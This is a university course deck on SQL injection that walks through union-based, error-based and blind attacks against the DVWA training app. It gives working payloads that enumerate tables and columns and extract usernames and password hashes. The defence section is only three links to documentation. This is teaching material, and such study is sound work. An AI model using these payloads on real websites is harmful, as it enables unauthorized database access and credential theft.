Sql injections (Basic bypass authentication)
 
Sql interview question part 8
Sql interview question part 8Sql interview question part 8
Sql interview question part 8
 
Ebook8
Ebook8Ebook8
Ebook8
 
Seminar2015Bilic_Nicole
Seminar2015Bilic_NicoleSeminar2015Bilic_Nicole
Seminar2015Bilic_Nicole
 
SQL INJECTION
SQL INJECTIONSQL INJECTION
SQL INJECTION
 
Types of sql injection attacks
Types of sql injection attacksTypes of sql injection attacks
Types of sql injection attacks
 
Web application security
Web application securityWeb application security
Web application security
 
Sql injection
Sql injectionSql injection
Sql injection
 
SQL Injection
SQL InjectionSQL Injection
SQL Injection
 
Asp
AspAsp
Asp
 

Recently uploaded

Hindi varnamala | hindi alphabet PPT.pdf
Hindi varnamala | hindi alphabet PPT.pdfHindi varnamala | hindi alphabet PPT.pdf
Hindi varnamala | hindi alphabet PPT.pdf
Dr. Mulla Adam Ali
 
Solutons Maths Escape Room Spatial .pptx
Solutons Maths Escape Room Spatial .pptxSolutons Maths Escape Room Spatial .pptx
Solutons Maths Escape Room Spatial .pptx
spdendr
 
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Leena Ghag-Sakpal
 
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdfIGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
Amin Marwan
 
B. Ed Syllabus for babasaheb ambedkar education university.pdf
B. Ed Syllabus for babasaheb ambedkar education university.pdfB. Ed Syllabus for babasaheb ambedkar education university.pdf
B. Ed Syllabus for babasaheb ambedkar education university.pdf
BoudhayanBhattachari
 
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem studentsRHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
Himanshu Rai
 
math operations ued in python and all used
math operations ued in python and all usedmath operations ued in python and all used
math operations ued in python and all used
ssuser13ffe4
 
Wound healing PPT
Wound healing PPTWound healing PPT
Wound healing PPT
Jyoti Chand
 
Gender and Mental Health - Counselling and Family Therapy Applications and In...
Gender and Mental Health - Counselling and Family Therapy Applications and In...Gender and Mental Health - Counselling and Family Therapy Applications and In...
Gender and Mental Health - Counselling and Family Therapy Applications and In...
PsychoTech Services
 
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptxBeyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
EduSkills OECD
 
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdfANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
Priyankaranawat4
 
Film vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movieFilm vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movie
Nicholas Montgomery
 
The History of Stoke Newington Street Names
The History of Stoke Newington Street NamesThe History of Stoke Newington Street Names
The History of Stoke Newington Street Names
History of Stoke Newington
 
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
PECB
 
Constructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective CommunicationConstructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective Communication
Chevonnese Chevers Whyte, MBA, B.Sc.
 
ZK on Polkadot zero knowledge proofs - sub0.pptx
ZK on Polkadot zero knowledge proofs - sub0.pptxZK on Polkadot zero knowledge proofs - sub0.pptx
ZK on Polkadot zero knowledge proofs - sub0.pptx
dot55audits
 
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
Nguyen Thanh Tu Collection
 
Pengantar Penggunaan Flutter - Dart programming language1.pptx
Pengantar Penggunaan Flutter - Dart programming language1.pptxPengantar Penggunaan Flutter - Dart programming language1.pptx
Pengantar Penggunaan Flutter - Dart programming language1.pptx
Fajar Baskoro
 
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
GeorgeMilliken2
 
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptxChapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Denish Jangid
 

Recently uploaded (20)

Hindi varnamala | hindi alphabet PPT.pdf
Hindi varnamala | hindi alphabet PPT.pdfHindi varnamala | hindi alphabet PPT.pdf
Hindi varnamala | hindi alphabet PPT.pdf
 
Solutons Maths Escape Room Spatial .pptx
Solutons Maths Escape Room Spatial .pptxSolutons Maths Escape Room Spatial .pptx
Solutons Maths Escape Room Spatial .pptx
 
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
Bed Making ( Introduction, Purpose, Types, Articles, Scientific principles, N...
 
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdfIGCSE Biology Chapter 14- Reproduction in Plants.pdf
IGCSE Biology Chapter 14- Reproduction in Plants.pdf
 
B. Ed Syllabus for babasaheb ambedkar education university.pdf
B. Ed Syllabus for babasaheb ambedkar education university.pdfB. Ed Syllabus for babasaheb ambedkar education university.pdf
B. Ed Syllabus for babasaheb ambedkar education university.pdf
 
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem studentsRHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
RHEOLOGY Physical pharmaceutics-II notes for B.pharm 4th sem students
 
math operations ued in python and all used
math operations ued in python and all usedmath operations ued in python and all used
math operations ued in python and all used
 
Wound healing PPT
Wound healing PPTWound healing PPT
Wound healing PPT
 
Gender and Mental Health - Counselling and Family Therapy Applications and In...
Gender and Mental Health - Counselling and Family Therapy Applications and In...Gender and Mental Health - Counselling and Family Therapy Applications and In...
Gender and Mental Health - Counselling and Family Therapy Applications and In...
 
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptxBeyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
Beyond Degrees - Empowering the Workforce in the Context of Skills-First.pptx
 
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdfANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
ANATOMY AND BIOMECHANICS OF HIP JOINT.pdf
 
Film vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movieFilm vocab for eal 3 students: Australia the movie
Film vocab for eal 3 students: Australia the movie
 
The History of Stoke Newington Street Names
The History of Stoke Newington Street NamesThe History of Stoke Newington Street Names
The History of Stoke Newington Street Names
 
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
ISO/IEC 27001, ISO/IEC 42001, and GDPR: Best Practices for Implementation and...
 
Constructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective CommunicationConstructing Your Course Container for Effective Communication
Constructing Your Course Container for Effective Communication
 
ZK on Polkadot zero knowledge proofs - sub0.pptx
ZK on Polkadot zero knowledge proofs - sub0.pptxZK on Polkadot zero knowledge proofs - sub0.pptx
ZK on Polkadot zero knowledge proofs - sub0.pptx
 
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
BÀI TẬP DẠY THÊM TIẾNG ANH LỚP 7 CẢ NĂM FRIENDS PLUS SÁCH CHÂN TRỜI SÁNG TẠO ...
 
Pengantar Penggunaan Flutter - Dart programming language1.pptx
Pengantar Penggunaan Flutter - Dart programming language1.pptxPengantar Penggunaan Flutter - Dart programming language1.pptx
Pengantar Penggunaan Flutter - Dart programming language1.pptx
 
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
What is Digital Literacy? A guest blog from Andy McLaughlin, University of Ab...
 
Chapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptxChapter wise All Notes of First year Basic Civil Engineering.pptx
Chapter wise All Notes of First year Basic Civil Engineering.pptx
 

Sql injection course made by Cristian Alexandrescu

  • 1. University of Craiova Faculty of Automatics, Computers and Electronics SQL injection -course- Cristian Alexandrescu
  • 2. Contents 1. Introduction ............................................................................................................................. 3 1.1 Database ................................................................................................................................ 3 1.2 SQL ....................................................................................................................................... 3 1.3 Simple queries of SQL.......................................................................................................... 3 1.4 What are SQL injections? ..................................................................................................... 3 1.5 What can cause those injections?.......................................................................................... 3 1.6 How can SQL injection affect the system administrators (root)?......................................... 4 1.7 How can SQL injection affect the website administrator?.................................................... 4 1.8 How can SQL injection affect the website users?................................................................. 4 1.9 How can SQL injection affect the web page visitors? .......................................................... 4 1.10 How can we do SQL injection?........................................................................................... 4 2. Classification ........................................................................................................................... 5 2.1 Union based........................................................................................................................... 5 2.2 Error based ............................................................................................................................ 5 2.3 Blind based............................................................................................................................ 5 3. Possible scenario...................................................................................................................... 6 3.1 Types of SQL queries............................................................................................................ 6 3.2 Union based........................................................................................................................... 9 3.3 Error based .......................................................................................................................... 15 3.4 Blind based.......................................................................................................................... 19 4. Methods of protection............................................................................................................ 25 5. Conclusions ........................................................................................................................... 26 Bibliography
  • 3. 3 1. Introduction In the last year this type of vulnerability is more frequent on websites. First we need to know what does this vulnerability represents, how to exploit it and how to protect against her. 1.1 Database The database is a collection of data. From the perspective of a website, database is used to store different information like username, password, web pages, information about the website and many others. Examples of databases: DB servers, MySQL, MSSQL, Oracle, Prostgre SQL, SQLite. 1.2 SQL Structured Query Language is known as SQL. If we want to communicate with the database we use the SQL Queries. 1.3 Simple queries of SQL SELECT * FROM table_name; This instruction will output the information from the table including the name of the columns Ex: SELECT * FROM users; INSERT INTO users(username, password) VALUES(“user”, “pass”); We use it for the insertion of the values user and pass in the table users, in the following columns: username and password. 1.4 What are SQL injections? SQL injections are a technique of injecting a malicious code used in the web applications. In the following labs I will show different types of possible attacks on a website. Those sequences of malicious SQL code are inserted in a field that will be executed either by GET or by POST and also by the server itself. 1.5 What can cause those injections? Through this method, an unauthorized person will obtain access on the database of the website, thus, the attacker gets access to all detailed information from the database.
  • 4. 4 1.6 How can SQL injection affect the system administrators (root)? Usually an error leads to another error and so on until a possible attacker succeeds to enter the server and from there things drastically change so that, once a malicious file is uploaded on the server, the attacker can control the website as well as the server. 1.7 How can SQL injection affect the website administrator? The website administrator can loose access to the admin panel, the attacker can change the password and modify the email from the database so that we can not recover the admin panel or the website. 1.8 How can SQL injection affect the website users? This is the worse part because once the website is already taken over, the website users will receive from the administrator a notification which says that we must access unknown page with malicious codes pretending to be something else, leading to the users also getting infected. 1.9 How can SQL injection affect the web page visitors? Let us assume that the server was already compromised and the attacker modifies the webpage structure and once the attacker enters the website, he can steal the cookies, infect other people etc. 1.10 How can we do SQL injection? We have the automated method with programs like sqlmap, mole, havij etc that are not very efficient because they are using only predefined queries and so if the injection is complicated, it won’t know what to do and it will quit, saying it is not vulnerable but instead it is. The second method refers to manual injections that we will discuss in within this laboratory as well as other possible types of attacks on a website in the following laboratories.
  • 5. 5 2. Classification To the present have been discovered 3 main methods of SQL injection and those are: 2.1 Union based With this method we search the numbers of columns that the current table has and through applying the following command we obtain certain “errors” that we can exploit in our favor: union select 1,2,3,4,5,…(the number of columns that the current table has) We can obtain information such as: PHP version, the user with which we try to make the SQL queries (many times [person/website name]@localhost), database name, system user, permissions from the server as well as any information from the database. The commands for a custom query of union based (because everything we discuss here will be made manually). I will show them in the next paragraph in which I will demonstrate a possible attack on a server (in our case the internal server). 2.2 Error based It is the second method of SQLi (SQL injection). Unlike union based, in this method we can output only a single piece of information one time through a SQL error. Commands in error based are quite complex so we can not memorize them by heart. What I want you to remember is that by using union based or error based commands we will output the same information but the difference is that one is quicker then other. 2.3 Blind based The last technique in the series of SQLi “outputs” the information slower then the first two because the number of queries may increase significantly according to the information from the database. The queries will be similar to the game true or false, if the query is correct then the server will output the website normally and if it is false, then the server will output only parts of the website I will make examples for each type in the next section: The possible scenario where I will explain in detail every step that I will do to get to the wanted information from the database.
  • 6. 6 3. Possible scenario In this scenario I will use the Damn Vulnerable Web App (DVWA) that is a written in PHP. This tool is created for teachers/students/or people that want to learn more about application security in a class room environment. I will use it to prove the concept of SQL injection. First of all when we have to start an injection of one of the 3 types, we need to close the query such that the next sequence will execute like we want to! If we want to see the sequence of code in real time we can add the following PHP code: $html .= '<pre>' .$getid . '<br><pre>'; 3.1 Types of SQL queries 3.1.1 String based Suppose that we have the following sequence: $id = $_GET['id']; $getid = "SELECT first_name, last_name FROM users WHERE user_id = '$id'"; To execute commands we need to close the sequence correctly such that the code will get executed correctly! How we do that? We try something simple '(single quote). You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1''' at line 1
  • 7. 7 What does this mean? It means that we have a MySQL database and why we get that error? Let us understand better! select first_name, last_name from users where user_id='''; In the end of the sequence we put --+ (-- is a comment and + is for the type of string based that represents a space). (!!! It will also work with --+- or -- -.) select first_name, last_name from users where user_id=''-- '; When we find that id=1'--+ is working correctly, we can continue the injection. 3.1.2 Integer based $getid = "SELECT first_name, last_name FROM users WHERE user_id = $id"; We try like the last time '(single quote).
  • 8. 8 You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''' at line 1 If we put id=1'--+ we get the following error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''--' at line 1 This means we can no use string based! What does is happen when we take out the '? id=1--+ or even id=1-- we see that it executes correctly the sequence and the page has no errors or missing text. select first_name, last_name from users where user_id=1--;
  • 9. 9 3.1.3 Multiple types The query could differ from the first 2 types presented before. This means that it could close the query even with "--, ')--, )--, ))--, ")--, ")- -, '))-- etc. So it means that the query can be in multiple methods, the main idea is that only one will work! Some examples of SQL queries: select * from table_name where id=1 select * from table_name where id='1' select * from table_name where id="1" select * from table_name where id=(1) select * from table_name where id=('1') select * from table_name where id=("1") 3.2 Union based The following methods are an example only for string based and integer based. As the name itself says, this type of injection will use the command UNION from SQL that combines the result of two or more SELECT statements like the following example: SELECT column_name(s) FROM table1 UNION SELECT column_name(s) FROM table2; We check the functionality of order by: How does order by work? It is used for sorting the results obtained through SELECT. SELECT column_name, column_name FROM table_name ORDER BY column_name ASC|DESC, column_name ASC|DESC; order by 1 (if it works we try 2,3,….N, where N is the last number of the columns of the actual table).
  • 10. 10 Let us assume we reach 2 (order by 2). I tried 2 and it worked, if I try order by 3 we obtain an error. Unknown column '3' in 'order clause' Why do we receive an error when we try order by? The table that we are using now has only 2 columns that used in the query. Now we must use union select to inject the commands through we find the information in the database. union select 1,2 We do we write 1,2 instead of 1,2,3,4? Like I said before in our table we have only 2 columns that will be used by the query: SELECT first_name, last_name FROM users We already know the table but we assume that we do not. We obtain 1 and 2 – those are the vulnerable columns.
  • 11. 11 (!!! If it does not output anything and we do not get any errors, we put the parameter with a number that does not exist on the database, or we can deny it.) For example: id=1’ and 0 union select 1,2--+ id=1’ and 1=0 union select 1,2--+ id=-1’ union select 1,2--+ id=0’ union select 1,2--+ id=99999’ union select 1,2--+ We modify one of the outputted vulnerable columns to check the version of the running MySQL server. The purpose is to identify the version of the DBMS to search for the eventual known vulnerabilities for that version. union select 1,version() We get 5.6.24 – this version is in my example but on each server depends on the running MySQL server. On CSIRT there are known/declared/registered vulnerabilities for every version of MySQL DBMS. Those can be later exploited with the help of other techniques/instruments of attack.
  • 12. 12 We check the name of the database. The purpose is to get the current database where the application runs. union select 1,database() We get the name of the database entitled: dvwa. To obtain all the tables from the database with the purpose of identifying a table that can have a possible administrator account. We will use the following SQL commands to obtain all tables from the current database: group_concat(table_name) – which we add in the place of the database()
  • 13. 13 from information_schema.tables where table_schema=database() – which we will add at the end of the SQL command: union select 1,group_concat(table_name) from information_schema.tables where table_schema=database() How do the previous commands work? group_concat() is a function that returns a string by concatenating the not null values of a group. information_schema.tables is a function that carries all the existing tables from the existing databases on the server. table_schema is a function that can be set with a database name from where we want to get specific information. We obtain guestbook and users. To extract information from users we need to modify the command like this: We modify table_name and replace it with column_name and at the end we will write from information_schema.columns where table_name = 0x7573657273 Where 0x7573657273 are users transformed in the hexadecimal format – we use for efficiency the add-on Hackbar from Firefox. We could have used users directly, but we are not sure if the current SQL user can write or read the restricted files of the server. We find user_id, first_name, last_name, user, password, avatar, USER, CURRENT_CONNECTIONS, TOTAL_CONNECTIONS.
  • 14. 14 To output the information from the columns user and password” we have the following command: union select 1, group_concat(0x3c62723e,user,0x3a3a,password) from users Where 0x3c62723e is <br> in HTML.We receive the wanted information from the 2 columns (user and password) from the table users. Let us assume we have the admin tables with the columns username and password. The command will look like this: union select 1,group_concat(username,0x0a,password),3 from admin Executing the interrogation we will receive the admin account and the password! If we look closely, we will see that the password is a hash encrypted, maybe with MD5 or SHA- 1 –> unidirectional hash. What does this mean? A password once encrypted it can not be decrypted, this means is hard to break and so we can try dictionary attack, rainbow tables and/or even brute-force attack.
  • 15. 15 3.3 Error based In his method, like I said before, we can output one piece of information at a time! This means: and(select 1 from(select count(*),concat((select (select concat(version(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a) Duplicate entry '5.6.24' for key 'group_key' If we wish to output the name of the database, we modify the version() with database(). and(select 1 from(select count(*),concat((select (select concat(database(),0x00)) from information_schema.tables limit 0,1),floor(rand(0)*2)) as x from information_schema.tables group by x)a) If we want to reach the tables, we must change the query a little. and(select 1 from(select count(*),concat((select (select (select concat(table_name,0x00) from information_schema.tables where table_schema=database() limit 0,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a)
  • 16. 16 Duplicate entry '~guestbook' for key 'group_key' To get to the next table we modify the increment the limit. (!!! If the query works for limit 5,1 but not for limit 6,1 this means there are only 6 tables in that database. This rule works also for determining the number of columns or number of records from a table.) and(select 1 from(select count(*),concat((select (select (select concat(table_name,0x00) from information_schema.tables where table_schema=database() limit 1,1)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) When we try limit 2,1 we receive a valid web page without any errors this is because we try to exploit the information from the database using SQL errors and this means that we already know there are only 2 tables in the database named dvwa!
  • 17. 17 We can see what columns are inside the table named users with the next query: and(select 1 from(select count(*),concat((select (select (select concat(column_name,0x00) from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 0,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a) Where 0x7573657273 = users We continue to increment the limit of the columns to search for the user and password, the same as union based. limit 1,1 limit 2,1 And so on, depending on how many columns we want to get...
  • 18. 18 and(select 1 from(select count(*),concat((select (select (select concat(column_name,0x00) from information_schema.columns where table_name=0x7573657273 and table_schema=database() limit 3,1)) from information_schema.columns limit 0,1),floor(rand(0)*2))x from information_schema.columns group by x)a) The query to obtain the first record from table users using the columns user and password is: and (select 1 from(select count(*),concat((select concat(user,0x3a,password) from users limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) For the next records we modify the limit as in the previously query! limit 1,1 And so on, depending on how many records you want to get...
  • 19. 19 3.4 Blind based This method is very frequently met and it is very hard to exploit manually because of the time to create the queries. In the following, I will show you the method without doing it until the end, because it will need a lot of time even for this small database! To simply check if the blind based is present on the server, we can assume a truth condition like id=1’ and 1=1--+ and if we will get the same page, this can be a blind based injection. To be sure we will try and 1=0. If the page loads without some parts of the text because 1 is not equal to 0 (and 1 is equal to 1), thus we will check if the server responses to our questions with true or false (true if the page loads normally, false otherwise). We will ask the server if he had DBMS version 4 (even that I know it is 5). and substring(@@version,1,1)=4
  • 20. 20 A part of the text disappears, now we will try with 5: and substring(@@version,1,1)=5 It loads normally this means we have the version 5 on the DBMS. If we want to get the information from the database we need to understand how the server will answer to our queries. If we want to get the tables, we first need to understand the ASCII table. Why do we need ASCII? This is how blind based injection works: using the SQL ascii() function. If the look on next page, on the ASCII table, we see that: ‘a’ = 97, ‘A’ = 65, ‘g’ = 103 And the examples can continue…
  • 21. 21 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))>65 We want to know is the first letter of the first table name is grater then A (65 = ‘A’ in ascii). We continue to add, until we get the following result: and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))<104 (110 = ‘n’)
  • 22. 22 We almost found the first letter (even that we already know it from union based and error based, table name is “guestbook”) and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),1,1))=103 For the next letter we see that u is 117 so we modify the query a little: and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),2,1))=117 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),3,1))=101 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),4,1))=115 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),5,1))=116 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),6,1))=98 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),7,1))=111
  • 23. 23 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),8,1))=111 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 0,1),9,1))=107 Now we found “guestbook”, I won’t stay the same on getting the table ”users” that we already know, the process in the same. and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),1,1))=117 and ascii(substring((select table_name from information_schema.tables where table_schema=database() limit 1,1),2,1))=115 And so on until the end... We know only the name of the table: users, without any other information. The next part comes with a guess of columns, not 100% sure to guess the columns but for a learning purpose I already know the columns. We assume that we have the column username, so we will try to see if it exists. and (SELECT substring(concat(1,username),1,1) from users limit 0,1)=1 It seems that username does not exist in table users. and (SELECT substring(concat(1,user),1,1) from users limit 0,1)=1
  • 24. 24 It works because the web page loads normally but what if we try password? and (SELECT substring(concat(1,password),1,1) from users limit 0,1)=1 It works as well and now we need to find the first column of the table users (usually id or user_id). and (SELECT substring(concat(1,id),1,1) from users limit 0,1)=1 Unknown column 'id' in 'field list' and (SELECT substring(concat(1,user_id),1,1) from users limit 0,1)=1 Now we need to find the administrator account and the password: and ascii(substring((SELECT concat(user) from users where user_id=1),1,1))=97 and ascii(substring((SELECT concat(user) from users where user_id=1),2,1))= 100 and ascii(substring((SELECT concat(user) from users where user_id=1),3,1))= 109 and ascii(substring((SELECT concat(user) from users where user_id=1),4,1))= 105 and ascii(substring((SELECT concat(user) from users where user_id=1),5,1))= 110 (admin = 97,100,109,105,110) and ascii(substring((SELECT concat(password) from users where user_id=1),1,1))=53 and ascii(substring((SELECT concat(password) from users where user_id=1),2,1))=102 We continue to search until we find all the information in the password column.
  • 25. 25 4. Methods of protection http://php.net/manual/en/mysqli.quickstart.prepared-statements.php http://php.net/manual/en/pdo.prepare.php https://docs.oracle.com/javase/7/docs/api/java/sql/PreparedStatement.html
  • 26. 26 5. Conclusions As I said before in this course, this type of vulnerability is very easy to be exploited and exists on many websites in present. SQLi is part of web application vulnerabilities that can be exploited very easy on small websites in which the developers are not prepared to protect their server, the web page and the information from a possible attack of this type of vulnerability. However not all the small web pages have this kind of vulnerability, it can be found also on many important websites from all around the world. A student said the following: “If we want to be protected from SQLi we need to se the parameter on POST because if would not appear directly on the web page of in the browser URL.” To clarify this problem, I asked the following: “Do you think this would be enough to protect you from a possible attacker? Maybe if a script kiddie would try this, he would not succeed, but if an experienced hacker would target your website he would most certainly penetrate your website. (A script kiddie is a person with little knowledge about security that uses tools made by experienced hackers to destroy websites or servers.) Maybe something the Web Application Firewall would stop you from running some commands like: union, select, union select, etc. but most certainly it can not protect you from new queries made by people with experience in this domain. As long as SQL will exist, SQLi will also exist!